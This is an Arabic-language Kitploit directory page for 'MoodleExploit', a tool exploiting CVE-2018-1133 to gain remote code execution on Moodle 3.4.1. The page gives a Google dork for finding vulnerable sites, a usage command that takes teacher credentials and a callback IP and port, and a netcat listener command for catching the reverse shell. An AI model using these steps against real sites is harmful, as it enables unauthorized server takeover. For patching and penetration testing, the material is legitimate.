Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
MoodleExploit — نودل [Moodle RCE] (الإصدار 3.4.1) - CVE-2018-1133 | Kitploit
أدوات/GitHubGitHub/darrynten/moodleexploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubdarrynten/moodleexploit

MoodleExploit

نودل [Moodle RCE] (الإصدار 3.4.1) - CVE-2018-1133

عرض المستودع
105منذ 7 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال Moodle

  • عنوان الاستغلال: Moodle v3.4.1 RCE Exploit
  • Google Dork: inurl:"/course/jumpto.php?jump="
  • التاريخ: 15 مارس 2019
  • مؤلف الاستغلال: Darryn Ten
  • الصفحة الرئيسية للبائع: https://moodle.org
  • رابط البرنامج: https://github.com/moodle/moodle/archive/v3.4.1.zip
  • الإصدار: 3.4.1 (ربما < 3.5.0 وربما حتى 3.x)
  • تم الاختبار على: Linux مع Moodle v3.4.1
  • CVE : CVE-2018-1133

يمكن للمستخدم الذي يمتلك دور المعلم تنفيذ كود عشوائي.

الاستخدام

php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1

root@kitploit:~
user       اسم المستخدم للحساب
pass       كلمة مرور الحساب
ip         عنوان IP للرد
port       منفذ الرد
course     معرف دورة صالح يتبع للمعلم

تأكد من تشغيل مستمع netcat على المنفذ المحدد قبل تنفيذ هذا البرنامج النصي.

nc -lnvp 1010

سيحاول هذا فتح شل عكسي لعنوان IP والمنفذ المستمع.

ملاحظات

يعتمد هذا الاستغلال على معلومات مقدمة من Robin Peraglie.

قراءة إضافية: https://blog.ripstech.com/2018/moodle-remote-code-execution

تنزيل الأداة